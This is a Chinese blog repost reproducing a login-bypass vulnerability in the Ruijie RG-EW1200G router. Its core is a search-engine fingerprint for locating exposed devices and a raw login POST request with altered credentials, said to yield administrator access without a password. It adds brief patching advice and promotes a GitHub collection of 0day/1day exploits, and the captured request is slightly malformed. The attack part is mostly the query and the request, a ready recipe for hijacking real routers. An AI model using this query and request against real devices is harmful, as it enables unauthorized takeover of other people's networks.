当前位置: 首页 > news >正文

【漏洞复现】锐捷 RG-EW1200G 无线路由器 登录绕过


》》》产品描述《《《

        锐捷网络RG-EW1200G是一款有线无线全千兆双频无线路由器Q,适合平层家居、别墅、小型店铺、SOHO办公等场景使用。设备性能卓越,足以满足千兆上网需求;信号强劲,信号功率功率提升3倍,覆盖距离提升近1倍覆盖能力强。        


》》》漏洞描述《《《

        锐捷网络 RG-EW1200G 存在登录绕过逻辑漏洞,允许任何用户无需密码即可获得设备管理员权限


》》》搜索语句《《《

body="static/css/app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"


》》》漏洞复现《《《

登录时抓包修改账号

POST /api/sys/login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Length: 66
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded{"username":"2","password":"1231111111","timestamp":1692412880000}


》》》修复建议《《《

        为了确保系统安全,建议你采取以下措施:首先,除非特别需要,尽量不要让系统连上互联网,以减少被黑客攻击的风险。其次,通过防火墙等安全设备设定访问规则,只允许经过批准的设备访问系统,这样可以有效控制谁能进入系统。最后,务必将产品更新到最新版本,以及时修复已知的安全漏洞,保持系统的安全性。


-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------


http://www.mrgr.cn/news/43395.html

相关文章:

  • STL07——手写一个简单版本的unordered_set
  • Error while loading conda entry point: conda-libmamba-solver
  • C++ 语言特性29 - 协程介绍
  • 【Python】Dejavu:Python 音频指纹识别库详解
  • 【运动控制】关于GPIO的NPN型输入与NPN漏型输入
  • 算法工程师重生之第二十天(组合总和 组合总和II 分割回文串 )
  • 2024/10/5 数据结构打卡
  • 【MySQL】数据库基础
  • 几个卷积神经网络(CNN)可视化的网站
  • 快仓智能斩获过亿美元D轮融资,加速全球智能仓储与物流布局
  • 优化理论及应用精解【21】
  • 直立行走机器人技术概述
  • CSS选择器 快速入门
  • 分治算法(1)_颜色分类
  • c++----多态(初识)
  • 汇编语言数据传送指令 LDS 和 LES 有什么区别 目标段寄存器,使用常见和段寄存器的影响之间的差异
  • 如何注册西柚云服务器账号?渠道优惠下单获得立减200优惠
  • MOE并行策略的实现
  • 牛客网练习5
  • 华为OD机试 - 转骰子(Java 2024 E卷 100分)